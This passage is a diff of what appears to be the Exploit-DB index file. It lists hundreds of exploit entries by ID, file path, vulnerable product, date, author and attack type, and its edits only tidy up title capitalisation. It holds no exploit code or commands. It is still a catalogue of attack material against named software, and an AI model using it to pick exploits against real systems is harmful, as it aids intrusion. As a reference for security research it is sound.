id,file,description,date,author,platform,type,port 24209,platforms/windows/dos/24209.txt,"Sygate Personal Firewall Pro 5.5 - Local Denial of Service Vulnerability",2004-06-14,"Tan Chew Keong",windows,dos,0 24210,platforms/hp-ux/local/24210.pl,"HP-UX 7-11 - Local X Font Server Buffer Overflow Vulnerability",2003-03-10,watercloud,hp-ux,local,0 24211,platforms/windows/dos/24211.txt,"Microsoft Internet Explorer 6.0 - HREF Save As Denial of Service Vulnerability",2004-06-15,"Rafel Ivgi The-Insider",windows,dos,0 -24212,platforms/php/webapps/24212.txt,"Pivot 1.0 - Remote module_db.PHP File Include Vulnerability",2004-06-15,loofus,php,webapps,0 +24212,platforms/php/webapps/24212.txt,"Pivot 1.0 - Remote module_db.php File Include Vulnerability",2004-06-15,loofus,php,webapps,0 24213,platforms/windows/remote/24213.txt,"Microsoft Internet Explorer 5.0.1 Wildcard DNS Cross-Site Scripting Vulnerability",2004-06-15,"bitlance winter",windows,remote,0 24214,platforms/asp/webapps/24214.txt,"Web Wiz Forums 7.x Registration_Rules.ASP Cross-Site Scripting Vulnerability",2004-06-15,"Ferruh Mavituna",asp,webapps,0 24215,platforms/php/webapps/24215.txt,"phpHeaven phpMyChat 0.14.5 usersL.php3 - Multiple Parameter SQL Injection",2004-06-15,HEX,php,webapps,0 @@ -21414,7 +21414,7 @@ id,file,description,date,author,platform,type,port 24226,platforms/hardware/remote/24226.txt,"D-Link AirPlus DI-614+_ DI-624_ DI-704 DHCP Log HTML Injection Vulnerability",2004-06-21,c3rb3r,hardware,remote,0 24227,platforms/php/webapps/24227.txt,"SqWebMail 4.0.4.20040524 - Email Header HTML Injection Vulnerability",2004-06-21,"Luca Legato",php,webapps,0 24228,platforms/php/webapps/24228.txt,"Joomla com_collector Component Arbitrary File Upload Vulnerability",2013-01-19,"Red Dragon_al",php,webapps,0 -24229,platforms/php/webapps/24229.txt,"WordPress plugin Ripe HD FLV Player - SQL Injection Vulnerability",2013-01-19,Zikou-16,php,webapps,0 +24229,platforms/php/webapps/24229.txt,"WordPress Plugin Ripe HD FLV Player - SQL Injection Vulnerability",2013-01-19,Zikou-16,php,webapps,0 24231,platforms/php/webapps/24231.txt,"ArbitroWeb PHP Proxy 0.5/0.6 - Cross-Site Scripting Vulnerability",2004-06-22,"Josh Gilmour",php,webapps,0 24232,platforms/php/webapps/24232.txt,"PHP-Nuke 1.0/2.5/3.0/4.x/5.x/6.x/7.x - Multiple Vulnerabilities",2004-06-23,"Janek Vind",php,webapps,0 24233,platforms/freebsd/dos/24233.c,"FreeBSD 4.10/5.x - execve() Unaligned Memory Access Denial of Service Vulnerability",2004-06-23,"Marceta Milos",freebsd,dos,0 @@ -21455,10 +21455,10 @@ id,file,description,date,author,platform,type,port 24268,platforms/multiple/remote/24268.txt,"Code-Crafters Ability Mail Server 1.18 errormsg Parameter XSS",2004-07-12,dr_insane,multiple,remote,0 24269,platforms/php/webapps/24269.txt,"NConf 1.3 (detail.php detail_admin_items.php id parameter) SQL Injection",2013-01-21,haidao,php,webapps,0 24270,platforms/php/webapps/24270.txt,"NConf 1.3 - Arbitrary File Creation",2013-01-21,haidao,php,webapps,0 -24357,platforms/php/webapps/24357.txt,"PluggedOut Blog 1.51/1.60 Blog_Exec.PHP Cross-Site Scripting Vulnerability",2004-08-07,"befcake beefy",php,webapps,0 +24357,platforms/php/webapps/24357.txt,"PluggedOut Blog 1.51/1.60 Blog_Exec.php Cross-Site Scripting Vulnerability",2004-08-07,"befcake beefy",php,webapps,0 24272,platforms/multiple/remote/24272.rb,"Jenkins Script-Console Java Execution",2013-01-21,metasploit,multiple,remote,0 24273,platforms/php/remote/24273.rb,"PHP-Charts 1.0 - PHP Code Execution Vulnerability",2013-01-21,metasploit,php,remote,0 -24274,platforms/php/webapps/24274.pl,"phpBB 2.0.x Viewtopic.PHP PHP Script Injection Vulnerability",2004-07-12,"sasan hezarkhani",php,webapps,0 +24274,platforms/php/webapps/24274.pl,"phpBB 2.0.x Viewtopic.php PHP Script Injection Vulnerability",2004-07-12,"sasan hezarkhani",php,webapps,0 24275,platforms/unix/dos/24275.txt,"IBM Lotus Notes 6.0/6.5 - Multiple Java Applet Vulnerabilities",2004-07-13,"Jouko Pynnonen",unix,dos,0 24276,platforms/windows/remote/24276.txt,"Mozilla Browser 0.9/1.x Cache File - Multiple Vulnerabilities",2004-07-13,"Mind Warper",windows,remote,0 24277,platforms/windows/local/24277.c,"Microsoft Windows 2000/NT 4 - POSIX Subsystem Buffer Overflow Local Privilege Escalation Vulnerability",2004-07-16,bkbll,windows,local,0 @@ -21481,7 +21481,7 @@ id,file,description,date,author,platform,type,port 24294,platforms/php/webapps/24294.txt,"WordPress Developer Formatter - CSRF Vulnerability",2013-01-22,"Junaid Hussain",php,webapps,0 24295,platforms/php/webapps/24295.txt,"Adult Webmaster Script Password Disclosure Vulnerability",2013-01-22,"Dshellnoi Unix",php,webapps,0 24356,platforms/php/webapps/24356.txt,"Moodle 1.x - 'post.php' Cross-Site Scripting Vulnerability",2004-08-16,"Javier Ubilla",php,webapps,0 -24296,platforms/php/webapps/24296.txt,"Nucleus CMS 3.0_Blog:CMS 3_PunBB 1.x Common.PHP Remote File Include Vulnerability",2004-07-20,"Radek Hulan",php,webapps,0 +24296,platforms/php/webapps/24296.txt,"Nucleus CMS 3.0_Blog:CMS 3_PunBB 1.x Common.php Remote File Include Vulnerability",2004-07-20,"Radek Hulan",php,webapps,0 24297,platforms/windows/remote/24297.pl,"Serena TeamTrack 6.1.1 - Remote Authentication Bypass Vulnerability",2004-07-21,"Noam Rathaus",windows,remote,0 24298,platforms/asp/webapps/24298.pl,"Internet Software Sciences Web+Center 4.0.1 - Cookie Object SQL Injection Vulnerability",2004-07-21,"Noam Rathaus",asp,webapps,0 24299,platforms/asp/webapps/24299.pl,"NetSupport DNA HelpDesk 1.0 Problist Script SQL Injection Vulnerability",2004-07-21,"Noam Rathaus",asp,webapps,0 @@ -21519,7 +21519,7 @@ id,file,description,date,author,platform,type,port 24331,platforms/php/webapps/24331.txt,"Phorum 5.0.7 - Search Script Cross-Site Scripting Vulnerability",2004-07-28,vampz,php,webapps,0 24332,platforms/php/webapps/24332.txt,"Comersus Cart 5.0 - SQL Injection Vulnerability",2004-07-29,evol@ruiner.halo.nu,php,webapps,0 24333,platforms/php/webapps/24333.txt,"Verylost LostBook 1.1 Message Entry HTML Injection Vulnerability",2004-07-29,"Joseph Moniz",php,webapps,0 -24334,platforms/php/webapps/24334.txt,"JAWS 0.2/0.3/0.4 ControlPanel.PHP SQL Injection Vulnerability",2004-07-29,"Fernando Quintero",php,webapps,0 +24334,platforms/php/webapps/24334.txt,"JAWS 0.2/0.3/0.4 ControlPanel.php SQL Injection Vulnerability",2004-07-29,"Fernando Quintero",php,webapps,0 24335,platforms/unix/local/24335.txt,"Oracle9i Database - Default Library Directory Privilege Escalation Vulnerability",2004-07-30,"Juan Manuel Pascual Escribá",unix,local,0 24336,platforms/cgi/remote/24336.txt,"myServer 0.6.2 math_sum.mscgi Multiple Parameter XSS",2004-07-30,dr_insane,cgi,remote,0 24337,platforms/cgi/remote/24337.txt,"myServer 0.6.2 math_sum.mscgi Multiple Parameter Remote Overflow",2004-07-30,dr_insane,cgi,remote,0 @@ -21558,7 +21558,7 @@ id,file,description,date,author,platform,type,port 24372,platforms/php/webapps/24372.txt,"CuteNews 1.3.1 show_archives.php archive Parameter XSS",2004-07-16,"Debasis Mohanty",php,webapps,0 24373,platforms/php/webapps/24373.txt,"PScript PForum 1.24/1.25 User Profile HTML Injection Vulnerability",2004-07-16,"Christoph Jeschke",php,webapps,0 24374,platforms/windows/local/24374.c,"Ipswitch IMail Server 7/8 Weak Password Encryption Weakness",1999-12-20,Adik,windows,local,0 -24375,platforms/php/webapps/24375.txt,"RaXnet Cacti 0.6.x/0.8.x - Auth_Login.PHP SQL Injection Vulnerability",2004-07-16,"Fernando Quintero",php,webapps,0 +24375,platforms/php/webapps/24375.txt,"RaXnet Cacti 0.6.x/0.8.x - Auth_Login.php SQL Injection Vulnerability",2004-07-16,"Fernando Quintero",php,webapps,0 24376,platforms/multiple/remote/24376.txt,"Opera Web Browser 7.5 Resource Detection Weakness",2004-07-17,"GreyMagic Software",multiple,remote,0 24377,platforms/php/webapps/24377.txt,"Merak Mail Server 7.4.5 address.html Multiple Parameter XSS",2004-07-17,Criolabs,php,webapps,0 24378,platforms/php/webapps/24378.txt,"Merak Mail Server 7.4.5 settings.html Multiple Parameter XSS",2004-07-17,Criolabs,php,webapps,0 @@ -21579,7 +21579,7 @@ id,file,description,date,author,platform,type,port 24393,platforms/php/webapps/24393.txt,"MyDms 1.4 - SQL Injection Vulnerability And Directory Traversal Vulnerability",2004-08-21,"Jose Antonio",php,webapps,0 24394,platforms/multiple/dos/24394.txt,"Opera Web Browser 7.23 JavaScript Denial of Service Vulnerability",2004-08-21,sourvivor,multiple,dos,0 24395,platforms/windows/dos/24395.txt,"Microsoft Internet Explorer 6.0_ Firefox 0.8/0.9.x - JavaScript Denial of Service Vulnerability",2004-08-23,MeFakon,windows,dos,0 -24396,platforms/php/webapps/24396.txt,"JShop E-Commerce Suite 3.0 - Page.PHP Cross-Site Scripting Vulnerability",2004-08-23,"Dr Ponidi Haryanto",php,webapps,0 +24396,platforms/php/webapps/24396.txt,"JShop E-Commerce Suite 3.0 - Page.php Cross-Site Scripting Vulnerability",2004-08-23,"Dr Ponidi Haryanto",php,webapps,0 24397,platforms/asp/webapps/24397.txt,"Compulsive Media CNU5 News.mdb Database Disclosure Vulnerability",2004-08-23,"Security .Net Information",asp,webapps,0 24398,platforms/linux/local/24398.sh,"IMWheel 1.0 Predictable Temporary File Creation Vulnerability",2004-08-23,I)ruid,linux,local,0 24399,platforms/php/webapps/24399.txt,"PhotoADay Pad_selected Parameter Cross-Site Scripting Vulnerability",2004-08-23,"King Of Love",php,webapps,0 @@ -21656,7 +21656,7 @@ id,file,description,date,author,platform,type,port 24478,platforms/hardware/webapps/24478.txt,"Linksys WRT160N - Multiple Vulnerabilities",2013-02-11,m-1-k-3,hardware,webapps,0 24479,platforms/windows/remote/24479.py,"FreeFloat FTP 1.0 Raw Commands Buffer Overflow",2013-02-11,superkojiman,windows,remote,0 24480,platforms/php/webapps/24480.txt,"IRIS Citations Management Tool (post auth) Remote Command Execution",2013-02-11,aeon,php,webapps,0 -24481,platforms/php/webapps/24481.txt,"IP.Gallery 4.2.x and 5.0.x Persistent XSS Vulnerability",2013-02-11,"Mohamed Ramadan",php,webapps,0 +24481,platforms/php/webapps/24481.txt,"IP.Gallery 4.2.x / 5.0.x - Persistent XSS Vulnerability",2013-02-11,"Mohamed Ramadan",php,webapps,0 24483,platforms/hardware/webapps/24483.txt,"TP-LINK Admin Panel Multiple CSRF Vulnerabilities",2013-02-11,"CYBSEC Labs",hardware,webapps,0 24484,platforms/hardware/webapps/24484.txt,"Air Disk Wireless 1.9 iPad iPhone - Multiple Vulnerabilities",2013-02-11,Vulnerability-Lab,hardware,webapps,0 24485,platforms/windows/dos/24485.txt,"Windows - HWND_BROADCAST PoC (MS13-005)",2013-02-11,0vercl0k,windows,dos,0 @@ -21694,7 +21694,7 @@ id,file,description,date,author,platform,type,port 24530,platforms/php/webapps/24530.txt,"CKEditor 4.0.1 - Multiple Vulnerabilities",2013-02-20,AkaStep,php,webapps,0 24538,platforms/windows/remote/24538.rb,"Microsoft Internet Explorer - SLayoutRun Use-After-Free (MS13-009)",2013-02-23,metasploit,windows,remote,0 24533,platforms/php/webapps/24533.txt,"RTTucson Quotations Database Script (Auth Bypass) SQL Injection Vulnerability",2013-02-21,"cr4wl3r ",php,webapps,0 -24534,platforms/windows/webapps/24534.txt,"Alt-N MDaemon 13.0.3 and 12.5.6 Email Body HTML/JS Injection Vulnerability",2013-02-21,"QSecure and Demetris Papapetrou",windows,webapps,0 +24534,platforms/windows/webapps/24534.txt,"Alt-N MDaemon 13.0.3 / 12.5.6 - Email Body HTML/JS Injection Vulnerability",2013-02-21,"QSecure and Demetris Papapetrou",windows,webapps,0 24535,platforms/windows/webapps/24535.txt,"Alt-N MDaemon WorldClient 13.0.3 - Multiple Vulnerabilities",2013-02-21,"QSecure and Demetris Papapetrou",windows,webapps,0 24536,platforms/php/webapps/24536.txt,"glFusion 1.2.2 - Multiple XSS Vulnerabilities",2013-02-21,"High-Tech Bridge SA",php,webapps,0 24537,platforms/php/webapps/24537.txt,"phpMyRecipes 1.2.2 (viewrecipe.php r_id param) - SQL Injection Vulnerability",2013-02-21,"cr4wl3r ",php,webapps,0 @@ -21740,7 +21740,7 @@ id,file,description,date,author,platform,type,port 24579,platforms/osx/local/24579.rb,"Viscosity setuid-set ViscosityHelper Privilege Escalation",2013-03-05,metasploit,osx,local,0 24580,platforms/windows/dos/24580.txt,"Kaspersky Internet Security 2013 - Denial of Service Vulnerability",2013-03-05,"Marc Heuse",windows,dos,0 24581,platforms/multiple/remote/24581.txt,"SAFE TEAM Regulus 2.2 Staffile Information Disclosure Vulnerability",2004-09-07,masud_libra,multiple,remote,0 -24582,platforms/php/webapps/24582.txt,"SAFE TEAM Regulus 2.2 Custchoice.PHP Update Your Password Action Information Disclosure Vulnerability",2004-09-07,masud_libra,php,webapps,0 +24582,platforms/php/webapps/24582.txt,"SAFE TEAM Regulus 2.2 Custchoice.php Update Your Password Action Information Disclosure Vulnerability",2004-09-07,masud_libra,php,webapps,0 24583,platforms/php/webapps/24583.txt,"SAFE TEAM Regulus 2.2 Customer Statistics Information Disclosure Vulnerability",2004-09-07,masud_libra,php,webapps,0 24584,platforms/windows/remote/24584.c,"Cerulean Studios Trillian Client 0.74 MSN Module Remote Buffer Overflow Vulnerability",2004-09-08,Komrade,windows,remote,0 24585,platforms/php/webapps/24585.txt,"BBS E-Market Professional bf_130 (1.3.0) - Remote File Include Vulnerability",2004-09-09,"Ahmad Muammar",php,webapps,0 @@ -21818,9 +21818,9 @@ id,file,description,date,author,platform,type,port 24662,platforms/php/webapps/24662.txt,"DCP-Portal 3.7/4.x/5.x news.php cid Parameter XSS",2004-10-06,"Alexander Antipov",php,webapps,0 24663,platforms/php/webapps/24663.txt,"DCP-Portal 3.7/4.x/5.x contents.php cid Parameter XSS",2004-10-06,"Alexander Antipov",php,webapps,0 24664,platforms/php/webapps/24664.txt,"DCP-Portal 3.7/4.x/5.x - Multiple HTML Injection Vulnerabilities",2004-10-06,"Alexander Antipov",php,webapps,0 -24665,platforms/php/webapps/24665.txt,"DCP-Portal 3.7/4.x/5.x - Calendar.PHP HTTP Response Splitting Vulnerability",2004-10-06,"Alexander Antipov",php,webapps,0 +24665,platforms/php/webapps/24665.txt,"DCP-Portal 3.7/4.x/5.x - Calendar.php HTTP Response Splitting Vulnerability",2004-10-06,"Alexander Antipov",php,webapps,0 24666,platforms/asp/webapps/24666.txt,"Microsoft ASP.NET 1.x URI Canonicalization Unauthorized Web Access Vulnerability",2004-10-06,anonymous,asp,webapps,0 -24667,platforms/php/webapps/24667.txt,"WordPress 1.2 - Wp-login.PHP HTTP Response Splitting Vulnerability",2004-10-07,"Chaotic Evil",php,webapps,0 +24667,platforms/php/webapps/24667.txt,"WordPress 1.2 - Wp-login.php HTTP Response Splitting Vulnerability",2004-10-07,"Chaotic Evil",php,webapps,0 24668,platforms/multiple/dos/24668.txt,"Jera Technology Flash Messaging Server 5.2 - Remote Denial of Service Vulnerability",2004-10-07,"Luigi Auriemma",multiple,dos,0 24669,platforms/linux/remote/24669.txt,"MySQL 3.x/4.x ALTER TABLE/RENAME Forces Old Permission Checks",2004-10-08,"Oleksandr Byelkin",linux,remote,0 24670,platforms/asp/webapps/24670.txt,"Go Smart Inc GoSmart Message Board Multiple Input Validation Vulnerabilities",2004-10-11,"Positive Technologies",asp,webapps,0 @@ -21836,7 +21836,7 @@ id,file,description,date,author,platform,type,port 24680,platforms/cfm/webapps/24680.txt,"FuseTalk Forum 4.0 - Multiple Cross-Site Scripting Vulnerabilities",2004-10-13,steven,cfm,webapps,0 24681,platforms/hardware/remote/24681.txt,"3Com 3CRADSL72 ADSL Wireless Router Information Disclosure and Authentication Bypass Vulnerabilities",2004-10-13,Karb0nOxyde,hardware,remote,0 24682,platforms/windows/local/24682.c,"Microsoft Windows XP Weak Default Configuration Vulnerability",2004-10-13,americanidiot,windows,local,0 -24683,platforms/php/webapps/24683.txt,"Pinnacle Systems ShowCenter 1.51 SettingsBase.PHP Cross-Site Scripting Vulnerability",2004-10-14,"Secunia Research",php,webapps,0 +24683,platforms/php/webapps/24683.txt,"Pinnacle Systems ShowCenter 1.51 SettingsBase.php Cross-Site Scripting Vulnerability",2004-10-14,"Secunia Research",php,webapps,0 24684,platforms/windows/dos/24684.txt,"Yak! Chat Client 2.x FTP Server Directory Traversal Vulnerability",2004-10-15,"Luigi Auriemma",windows,dos,0 24685,platforms/php/webapps/24685.txt,"CoolPHP 1.0 - Multiple Remote Input Validation Vulnerabilities",2004-10-16,R00tCr4ck,php,webapps,0 24686,platforms/windows/remote/24686.txt,"Microsoft Outlook 2003 Security Policy Bypass Vulnerability",2004-10-18,http-equiv,windows,remote,0 @@ -21851,12 +21851,12 @@ id,file,description,date,author,platform,type,port 24977,platforms/linux/remote/24977.txt,"CUPS 1.1.x - HPGL File Processor Buffer Overflow Vulnerability",2004-12-15,"Ariel Berkman",linux,remote,0 24978,platforms/linux/remote/24978.txt,"Xine-Lib 0.9/1 - Remote Client-Side Buffer Overflow Vulnerability",2004-12-16,"Ariel Berkman",linux,remote,0 24696,platforms/linux/dos/24696.c,"Linux Kernel 2.6.x - IPTables Logging Rules Integer Underflow Remote PoC Vulnerability",2004-11-21,"Richard Hart",linux,dos,0 -24697,platforms/php/webapps/24697.txt,"Serendipity 0.x Exit.PHP HTTP Response Splitting Vulnerability",2004-10-21,ChaoticEvil,php,webapps,0 -24698,platforms/php/webapps/24698.txt,"UBBCentral UBB.threads 3.4/3.5 - DoSearch.PHP SQL Injection Vulnerability",2004-10-21,"Florian Rock",php,webapps,0 +24697,platforms/php/webapps/24697.txt,"Serendipity 0.x Exit.php HTTP Response Splitting Vulnerability",2004-10-21,ChaoticEvil,php,webapps,0 +24698,platforms/php/webapps/24698.txt,"UBBCentral UBB.threads 3.4/3.5 - DoSearch.php SQL Injection Vulnerability",2004-10-21,"Florian Rock",php,webapps,0 24699,platforms/windows/dos/24699.txt,"Microsoft Windows XP WAV File Handler Denial of Service Vulnerability",2004-10-22,HexView,windows,dos,0 24700,platforms/cgi/webapps/24700.txt,"Netbilling NBMEMBER Script Information Disclosure Vulnerability",2004-10-22,ls,cgi,webapps,0 24701,platforms/multiple/remote/24701.txt,"OpenWFE 1.4.x - Remote Cross-Site Scripting And Connection Proxy Vulnerabilities",2004-10-25,"Joxean Koret",multiple,remote,0 -24702,platforms/php/webapps/24702.txt,"MoniWiki 1.0/1.1 Wiki.PHP Cross-Site Scripting Vulnerability",2004-10-25,"Jeremy Bae",php,webapps,0 +24702,platforms/php/webapps/24702.txt,"MoniWiki 1.0/1.1 Wiki.php Cross-Site Scripting Vulnerability",2004-10-25,"Jeremy Bae",php,webapps,0 24703,platforms/cgi/webapps/24703.txt,"LinuxStat 2.x - Remote Directory Traversal Vulnerability",2004-10-25,anonymous,cgi,webapps,0 24704,platforms/linux/remote/24704.c,"Libxml2 - Multiple Remote Stack Buffer Overflow Vulnerabilities",2004-10-26,Sean,linux,remote,0 24705,platforms/windows/dos/24705.txt,"Microsoft Internet Explorer 6.0 Font Tag Denial of Service Vulnerability",2004-10-26,"Jehiah Czebotar",windows,dos,0 @@ -21886,7 +21886,7 @@ id,file,description,date,author,platform,type,port 24729,platforms/php/webapps/24729.txt,"webcalendar 0.9.x - Multiple Vulnerabilities",2004-11-10,"Joxean Koret",php,webapps,0 24730,platforms/multiple/remote/24730.txt,"04webserver 1.42 - Multiple Vulnerabilities",2004-11-10,"Tan Chew Keong",multiple,remote,0 24731,platforms/php/webapps/24731.txt,"Aztek Forum 4.0 - Multiple Input Validation Vulnerabilities",2004-11-12,"benji lemien",php,webapps,0 -24732,platforms/php/webapps/24732.txt,"Phorum 5.0.x FOLLOW.PHP SQL Injection Vulnerability",2004-11-11,"Janek Vind",php,webapps,0 +24732,platforms/php/webapps/24732.txt,"Phorum 5.0.x FOLLOW.php SQL Injection Vulnerability",2004-11-11,"Janek Vind",php,webapps,0 24733,platforms/windows/dos/24733.pl,"SecureAction Research Secure Network Messenger 1.4.x - Remote Denial of Service Vulnerability",2004-11-12,"Luigi Auriemma",windows,dos,0 24734,platforms/php/webapps/24734.txt,"chacmool Private Message System 1.1.3 - send.php tid Parameter XSS",2004-11-12,"digital ex",php,webapps,0 24735,platforms/php/webapps/24735.txt,"chacmool Private Message System 1.1.3 - send.php Arbitrary Message Access",2004-11-12,"digital ex",php,webapps,0 @@ -21905,8 +21905,8 @@ id,file,description,date,author,platform,type,port 24748,platforms/php/webapps/24748.txt,"event calendar - Multiple Vulnerabilities",2004-11-16,"Janek Vind",php,webapps,0 24749,platforms/linux/local/24749.sh,"Cscope 13.0/15.x Insecure Temporary File Creation Vulnerabilities (1)",2004-11-17,Gangstuck,linux,local,0 24750,platforms/linux/local/24750.c,"Cscope 13.0/15.x Insecure Temporary File Creation Vulnerabilities (2)",2004-11-17,Gangstuck,linux,local,0 -24751,platforms/php/webapps/24751.pl,"PHPBB 2.0.x Admin_cash.PHP Remote PHP File Include Vulnerability",2004-11-17,"Jerome Athias",php,webapps,0 -24752,platforms/php/webapps/24752.txt,"Invision Power Board 2.0 Index.PHP Post Action SQL Injection Vulnerability",2004-11-18,anonymous,php,webapps,0 +24751,platforms/php/webapps/24751.pl,"PHPBB 2.0.x Admin_cash.php Remote PHP File Include Vulnerability",2004-11-17,"Jerome Athias",php,webapps,0 +24752,platforms/php/webapps/24752.txt,"Invision Power Board 2.0 Index.php Post Action SQL Injection Vulnerability",2004-11-18,anonymous,php,webapps,0 24753,platforms/windows/local/24753.txt,"Mailtraq 2.x - Administration Console Local Privilege Escalation Vulnerability",2004-11-19,"Reed Arvin",windows,local,0 24754,platforms/windows/local/24754.txt,"Altiris Deployment Solution 5.6 - Client Service Local Privilege Escalation Vulnerability",2004-11-19,"Reed Arvin",windows,local,0 24755,platforms/linux/dos/24755.java,"opera Web browser 7.54 java implementation - Multiple Vulnerabilities (1)",2004-11-19,"Marc Schoenefeld",linux,dos,0 @@ -21956,40 +21956,40 @@ id,file,description,date,author,platform,type,port 24800,platforms/windows/remote/24800.txt,"Microsoft Internet Explorer 5.0.1 FTP URI Arbitrary FTP Server Command Execution Vulnerability",2004-12-06,"Albert Puigsech Galicia",windows,remote,0 24801,platforms/linux/remote/24801.txt,"KDE FTP KIOSlave URI Arbitrary FTP Server Command Execution Vulnerability",2004-12-06,"Albert Puigsech Galicia",linux,remote,0 24802,platforms/windows/remote/24802.txt,"Microsoft Internet Explorer 6.0 Sysimage Protocol Handler Local File Detection Vulnerability",2004-12-07,"Gregory R. Panakkal",windows,remote,0 -24803,platforms/php/webapps/24803.txt,"Blog Torrent 0.80 BTDownload.PHP Cross-Site Scripting Vulnerability",2004-12-07,Lostmon,php,webapps,0 +24803,platforms/php/webapps/24803.txt,"Blog Torrent 0.80 BTDownload.php Cross-Site Scripting Vulnerability",2004-12-07,Lostmon,php,webapps,0 24804,platforms/linux/dos/24804.c,"Linux Kernel 2.6.x - AIO_Free_Ring Local Denial of Service Vulnerability",2004-12-07,"Darrick J. Wong",linux,dos,0 24805,platforms/multiple/dos/24805.txt,"MySQL MaxDB 7.5 WAHTTP Server Remote Denial of Service Vulnerability",2004-12-07,"Evgeny Demidov",multiple,dos,0 24806,platforms/php/webapps/24806.txt,"darryl burgdorf weblibs 1.0 - Directory Traversal Vulnerability",2004-12-07,"John Bissell",php,webapps,0 24807,platforms/multiple/dos/24807.txt,"MD5 Message Digest Algorithm Hash Collision Weakness",2004-12-07,"Dan Kaminsky",multiple,dos,0 24808,platforms/windows/remote/24808.txt,"Microsoft Internet Explorer 6.0 - Search Pane URI Obfuscation Vulnerability",2004-12-08,http-equiv,windows,remote,0 24809,platforms/multiple/dos/24809.txt,"Kerio Personal Firewall 2.1.x/4.x - Local Denial of Service Vulnerability",2004-12-08,cesaro,multiple,dos,0 -24810,platforms/php/webapps/24810.txt,"PhpGedView 2.x Descendancy.PHP Cross-Site Scripting Vulnerability",2004-01-19,JeiAr,php,webapps,0 +24810,platforms/php/webapps/24810.txt,"PhpGedView 2.x Descendancy.php Cross-Site Scripting Vulnerability",2004-01-19,JeiAr,php,webapps,0 24811,platforms/windows/remote/24811.txt,"F-Secure Policy Manager 5.11 FSMSH.DLL CGI Application Installation Path Disclosure Vulnerability",2004-12-09,oliver@greyhat.de,windows,remote,0 -24814,platforms/php/webapps/24814.txt,"PhpGedView 2.5/2.6 Index.PHP Cross-Site Scripting Vulnerability",2004-01-12,JeiAr,php,webapps,0 +24814,platforms/php/webapps/24814.txt,"PhpGedView 2.5/2.6 Index.php Cross-Site Scripting Vulnerability",2004-01-12,JeiAr,php,webapps,0 24815,platforms/linux/dos/24815.txt,"Gamespy Software Development Kit CD-Key Validation Buffer Overflow Vulnerability",2004-12-10,"Luigi Auriemma",linux,dos,0 -24816,platforms/php/webapps/24816.txt,"PhpGedView 2.5/2.6 Individual.PHP Cross-Site Scripting Vulnerability",2004-01-12,JeiAr,php,webapps,0 -24817,platforms/php/webapps/24817.txt,"phpMyAdmin 2.x External Transformations Remote Command Execution",2004-12-13,"Nicolas Gregoire",php,webapps,0 +24816,platforms/php/webapps/24816.txt,"PhpGedView 2.5/2.6 Individual.php Cross-Site Scripting Vulnerability",2004-01-12,JeiAr,php,webapps,0 +24817,platforms/php/webapps/24817.txt,"phpMyAdmin 2.x - External Transformations Remote Command Execution",2004-12-13,"Nicolas Gregoire",php,webapps,0 24818,platforms/multiple/dos/24818.txt,"Digital Illusions CE Codename Eagle Remote Denial of Service Vulnerability",2004-12-13,"Luigi Auriemma",multiple,dos,0 -24819,platforms/php/webapps/24819.txt,"PhpGedView 2.5/2.6 Source.PHP Cross-Site Scripting Vulnerability",2004-01-12,JeiAr,php,webapps,0 -24820,platforms/php/webapps/24820.txt,"PhpGedView 2.5/2.6 Imageview.PHP Cross-Site Scripting Vulnerability",2004-01-12,JeiAr,php,webapps,0 -24821,platforms/php/webapps/24821.txt,"PhpGedView 2.5/2.6 Gedrecord.PHP Cross-Site Scripting Vulnerability",2004-01-12,JeiAr,php,webapps,0 -24822,platforms/php/webapps/24822.txt,"PhpGedView 2.5/2.6 Gdbi_interface.PHP Cross-Site Scripting Vulnerability",2004-01-12,JeiAr,php,webapps,0 +24819,platforms/php/webapps/24819.txt,"PhpGedView 2.5/2.6 Source.php Cross-Site Scripting Vulnerability",2004-01-12,JeiAr,php,webapps,0 +24820,platforms/php/webapps/24820.txt,"PhpGedView 2.5/2.6 Imageview.php Cross-Site Scripting Vulnerability",2004-01-12,JeiAr,php,webapps,0 +24821,platforms/php/webapps/24821.txt,"PhpGedView 2.5/2.6 Gedrecord.php Cross-Site Scripting Vulnerability",2004-01-12,JeiAr,php,webapps,0 +24822,platforms/php/webapps/24822.txt,"PhpGedView 2.5/2.6 Gdbi_interface.php Cross-Site Scripting Vulnerability",2004-01-12,JeiAr,php,webapps,0 24823,platforms/php/webapps/24823.txt,"sugarsales 1.x/2.0 - Multiple Vulnerabilities",2004-12-13,"Daniel Fabian",php,webapps,0 24824,platforms/php/webapps/24824.txt,"UBBCentral UBB.threads 6.2.3/6.5 showflat.php Cat Parameter XSS",2004-12-13,"dw. and ms.",php,webapps,0 24825,platforms/php/webapps/24825.txt,"UBBCentral UBB.threads 6.2.3/6.5 calendar.php Cat Parameter XSS",2004-12-13,"dw. and ms.",php,webapps,0 24826,platforms/php/webapps/24826.txt,"UBBCentral UBB.threads 6.2.3/6.5 - login.php Cat Parameter XSS",2004-12-13,"dw. and ms.",php,webapps,0 24827,platforms/php/webapps/24827.txt,"UBBCentral UBB.threads 6.2.3/6.5 - online.php Cat Parameter XSS",2004-12-13,"dw. and ms.",php,webapps,0 24828,platforms/linux/dos/24828.txt,"Opera Web Browser 7.54 KDE KFMCLIENT Remote Command Execution Vulnerability",2004-12-13,"Giovanni Delvecchio",linux,dos,0 -24829,platforms/php/webapps/24829.txt,"PhpGedView 2.5/2.6 Login.PHP URL Parameter Cross-Site Scripting Vulnerability",2004-01-12,JeiAr,php,webapps,0 -24830,platforms/php/webapps/24830.txt,"PhpGedView 2.5/2.6 Login.PHP Username Parameter Cross-Site Scripting Vulnerability",2004-01-12,JeiAr,php,webapps,0 -24831,platforms/php/webapps/24831.txt,"PhpGedView 2.5/2.6 Login.PHP Newlanguage Cross-Site Scripting Vulnerability",2004-01-12,JeiAr,php,webapps,0 -24832,platforms/php/webapps/24832.txt,"PhpGedView 2.5/2.6 Relationship.PHP Cross-Site Scripting Vulnerability",2004-01-12,JeiAr,php,webapps,0 +24829,platforms/php/webapps/24829.txt,"PhpGedView 2.5/2.6 Login.php URL Parameter Cross-Site Scripting Vulnerability",2004-01-12,JeiAr,php,webapps,0 +24830,platforms/php/webapps/24830.txt,"PhpGedView 2.5/2.6 Login.php Username Parameter Cross-Site Scripting Vulnerability",2004-01-12,JeiAr,php,webapps,0 +24831,platforms/php/webapps/24831.txt,"PhpGedView 2.5/2.6 Login.php Newlanguage Cross-Site Scripting Vulnerability",2004-01-12,JeiAr,php,webapps,0 +24832,platforms/php/webapps/24832.txt,"PhpGedView 2.5/2.6 Relationship.php Cross-Site Scripting Vulnerability",2004-01-12,JeiAr,php,webapps,0 24852,platforms/linux/remote/24852.txt,"MPG123 0.59 Find Next File Remote Client-Side Buffer Overflow Vulnerability",2004-12-15,"Bartlomiej 